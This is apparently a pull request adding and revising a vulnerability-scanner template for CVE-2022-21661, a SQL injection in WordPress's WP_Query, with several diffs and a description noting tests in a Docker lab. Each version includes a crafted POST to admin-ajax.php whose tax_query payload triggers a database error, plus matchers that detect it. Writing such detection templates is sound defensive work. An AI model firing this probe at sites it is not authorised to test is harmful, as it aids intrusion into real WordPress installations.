### PR TITLE
New Template CVE-2022-21661

### DIFF
--- a/cves/2022/CVE-2022-21661.yaml
+++ b/cves/2022/CVE-2022-21661.yaml
@@ -1,44 +1,39 @@
 id: CVE-2022-21661
 
 info:
-  name: WordPress Core 5.8.3 <=  'WP_Query' SQL Injection
-  author: Marcio Mendes - https://www.linkedin.com/in/marcio-mendes-0961b9106/
-  severity: Critical
-  description: WordPress Core 5.8.3 <= 'WP_Query' SQL Injection.
+  name: WordPress Core 5.8.3 <= 'WP_Query' SQL Injection
+  author: Marcio Mendes
+  severity: critical
+  description: |
+    Due to improper sanitization in WP_Query, there can be cases where SQL injection is possible through plugins or themes that use it in a certain way.
+  remediation: This has been patched in WordPress version 5.8.3. Older affected versions are also fixed via security release, that go back till 3.7.37. We strongly recommend that you keep auto-updates enabled. There are no known workarounds for this vulnerability.
   reference:
     - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
     - https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection
+    - http://packetstormsecurity.com/files/165540/WordPress-Core-5.8.2-SQL-Injection.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2022-21661
     cwe-id: CWE-89
-  tags: cve2022,wordpress,wp-plugin,wpscan,cve,sqli
+  tags: cve,cve2022,wordpress,wpscan,wp,sqli,wpquery
 
 requests:
   - raw:
       - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
-        Upgrade-Insecure_Requests: 1
-        User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64; tv:95.0) Gecko/20100101 Firefox/95.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.5,image/webp,image/apng,*/*;q-0.8,application/signed-exchange/;v=b3;q=0.9
-        Sec-Fetch-Dest: document
-        Sec-Fetch-Mode: navigate
-        Sec-Fetch-Site: cross-site
-        Sec-Fetch-User: ?1
-        Cache-Control: max-age=0
-        Connection: close
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 92
 
-        action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d
+        action=ecsload&query={"tax_query":{"0":{"field":"term_taxonomy_id","terms":[""]}}}&ecs_ajax_settings={"post_id":"1", "current_page":1, "widget_id":1, "theme_id":1, "max_num_pages":10}
 
     matchers:
-      - type: word
-        part: body
-        words:
-          - "WordPress database error:"
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/html")'
+          - 'contains(body, "WordPress database error:")'
+        condition: and
 
     extractors:
       - type: regex

--- a/cves/2022/CVE-2022-21661.yaml
+++ b/cves/2022/CVE-2022-21661.yaml
@@ -1,4 +1,5 @@
 id: CVE-2022-21661
+
 info:
   name: WordPress Core 5.8.3 <=  'WP_Query' SQL Injection
   author: Marcio Mendes - https://www.linkedin.com/in/marcio-mendes-0961b9106/
@@ -13,51 +14,34 @@ info:
     cve-id: CVE-2022-21661
     cwe-id: CWE-89
   tags: cve2022,wordpress,wp-plugin,wpscan,cve,sqli
+
 requests:
   - raw:
-      - >
+      - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
-
         Host: {{Hostname}}
-
         Upgrade-Insecure_Requests: 1
-
         User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64; tv:95.0) Gecko/20100101 Firefox/95.0
-
         Accept: text/html,application/xhtml+xml,application/xml;q=0.5,image/webp,image/apng,*/*;q-0.8,application/signed-exchange/;v=b3;q=0.9
-
         Sec-Fetch-Dest: document
-
         Sec-Fetch-Mode: navigate
-
         Sec-Fetch-Site: cross-site
-
         Sec-Fetch-User: ?1
-
         Cache-Control: max-age=0
-
-        Connection: close 
-
+        Connection: close
         Content-Type: application/x-www-form-urlencoded
-
         Content-Length: 92
 
-
         action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d
-    stop-at-first-match: false
-    matchers-condition: or
+
     matchers:
       - type: word
+        part: body
         words:
           - "WordPress database error:"
-        part: body
-      - type: status
-        status:
-          - 403
+
     extractors:
       - type: regex
-        part: all
         regex:
-          - WordPress database error*
-          - You have an error in your SQL syntax*
-          - 403 Forbidden*
+          - "WordPress database error*"
+          - "You have an error in your SQL syntax*"

--- a/cves/2022/CVE-2022-21661.yaml
+++ b/cves/2022/CVE-2022-21661.yaml
@@ -1,5 +1,4 @@
 id: CVE-2022-21661
-
 info:
   name: WordPress Core 5.8.3 <=  'WP_Query' SQL Injection
   author: Marcio Mendes - https://www.linkedin.com/in/marcio-mendes-0961b9106/
@@ -9,48 +8,56 @@ info:
     - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
     - https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection
   classification:
-    
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
     cve-id: CVE-2022-21661
-    
+    cwe-id: CWE-89
   tags: cve2022,wordpress,wp-plugin,wpscan,cve,sqli
-
 requests:
   - raw:
-      - |
+      - >
         POST /wp-admin/admin-ajax.php HTTP/1.1
+
         Host: {{Hostname}}
+
         Upgrade-Insecure_Requests: 1
+
         User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64; tv:95.0) Gecko/20100101 Firefox/95.0
+
         Accept: text/html,application/xhtml+xml,application/xml;q=0.5,image/webp,image/apng,*/*;q-0.8,application/signed-exchange/;v=b3;q=0.9
+
         Sec-Fetch-Dest: document
+
         Sec-Fetch-Mode: navigate
+
         Sec-Fetch-Site: cross-site
+
         Sec-Fetch-User: ?1
+
         Cache-Control: max-age=0
+
         Connection: close 
+
         Content-Type: application/x-www-form-urlencoded
+
         Content-Length: 92
 
-        action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d
 
+        action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d
     stop-at-first-match: false
     matchers-condition: or
     matchers:
-
       - type: word
         words:
-          - 'WordPress database error:'
+          - "WordPress database error:"
         part: body
-
       - type: status
         status:
-          - 403  
-
-    
+          - 403
     extractors:
       - type: regex
         part: all
         regex:
-          - "WordPress database error*"
-          - "You have an error in your SQL syntax*"
-          - "403 Forbidden*"
+          - WordPress database error*
+          - You have an error in your SQL syntax*
+          - 403 Forbidden*

--- a/cves/2022/CVE-2022-21661.yaml
+++ b/cves/2022/CVE-2022-21661.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-21661
 
 info:
-  name: WordPress Core 5.8.3 <= 'WP_Query' SQL Injection
+  name: WordPress Core 5.8.3 <= 'WP_Query' - SQL Injection
   author: Marcio Mendes
   severity: critical
   description: |
@@ -16,7 +16,9 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2022-21661
     cwe-id: CWE-89
-  tags: cve,cve2022,wordpress,wpscan,wp,sqli,wpquery
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,wordpress,wp,sqli,wpquery
 
 requests:
   - raw:
@@ -33,10 +35,5 @@ requests:
           - 'status_code == 200'
           - 'contains(content_type, "text/html")'
           - 'contains(body, "WordPress database error:")'
+          - 'contains(body, "error in your SQL syntax")'
         condition: and
-
-    extractors:
-      - type: regex
-        regex:
-          - "WordPress database error*"
-          - "You have an error in your SQL syntax*"

--- a/cves/2022/CVE-2022-21661.yaml
+++ b/cves/2022/CVE-2022-21661.yaml
@@ -1,0 +1,56 @@
+id: CVE-2022-21661
+
+info:
+  name: WordPress Core 5.8.3 <=  'WP_Query' SQL Injection
+  author: Marcio Mendes - https://www.linkedin.com/in/marcio-mendes-0961b9106/
+  severity: Critical
+  description: WordPress Core 5.8.3 <= 'WP_Query' SQL Injection.
+  reference:
+    - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
+    - https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection
+  classification:
+    
+    cve-id: CVE-2022-21661
+    
+  tags: cve2022,wordpress,wp-plugin,wpscan,cve,sqli
+
+requests:
+  - raw:
+      - |
+        POST /wp-admin/admin-ajax.php HTTP/1.1
+        Host: {{Hostname}}
+        Upgrade-Insecure_Requests: 1
+        User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64; tv:95.0) Gecko/20100101 Firefox/95.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.5,image/webp,image/apng,*/*;q-0.8,application/signed-exchange/;v=b3;q=0.9
+        Sec-Fetch-Dest: document
+        Sec-Fetch-Mode: navigate
+        Sec-Fetch-Site: cross-site
+        Sec-Fetch-User: ?1
+        Cache-Control: max-age=0
+        Connection: close 
+        Content-Type: application/x-www-form-urlencoded
+        Content-Length: 92
+
+        action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d
+
+    stop-at-first-match: false
+    matchers-condition: or
+    matchers:
+
+      - type: word
+        words:
+          - 'WordPress database error:'
+        part: body
+
+      - type: status
+        status:
+          - 403  
+
+    
+    extractors:
+      - type: regex
+        part: all
+        regex:
+          - "WordPress database error*"
+          - "You have an error in your SQL syntax*"
+          - "403 Forbidden*"


### PR DESCRIPTION
### Template / PR Information
Added: CVE-2022-21661

- References: 
https://nvd.nist.gov/vuln/detail/cve-2022-21661
https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection


I've validated this template locally?
- [Y] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

This template detects the vulnerability of the mentioned CVE or WAF if it is protected. It has been locally tested using a Docker laboratory, and the laboratory used can be found at https://github.com/WellingtonEspindula/SSI-CVE-2022-21661.

The 'or' option has been added in case there is any type of control already implemented with a 403 code, but this template is open for free editing.


